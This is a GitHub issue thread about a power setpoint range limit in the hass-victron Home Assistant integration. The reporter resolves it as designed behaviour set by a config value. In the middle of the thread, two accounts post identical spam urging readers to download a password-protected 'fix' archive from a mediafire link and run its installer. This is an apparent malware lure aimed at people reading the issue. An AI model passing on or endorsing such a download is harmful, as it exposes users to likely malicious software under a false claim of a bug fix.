sfstar/hass-victron #229: Input Values Range is not reflective of actual range.

kcoffau, 2024-08-27:
Error Shown: Value 10000 for number.victron_settings_ess_acpowersetpoint_0 is outside valid range -9200 - 9200
[image]

I can set this value via a direct ModbusTCP connection, but the HACS plugin seems to be identifying a range of -9200/9200.

amir1387aht, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

jia6214876, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

kcoffau, 2024-08-27:
Interesting. I've been looking at code at it seems to try to work out range dynamically. Good to know yours is different!

kcoffau, 2024-08-27:
found it.  its not a bug, its as designed.

[image]

The ESS minMax is voltage * the amps in setting.  This can't be auto detected by victron, therefore its a config value.

closed 2024-08-27 by kcoffau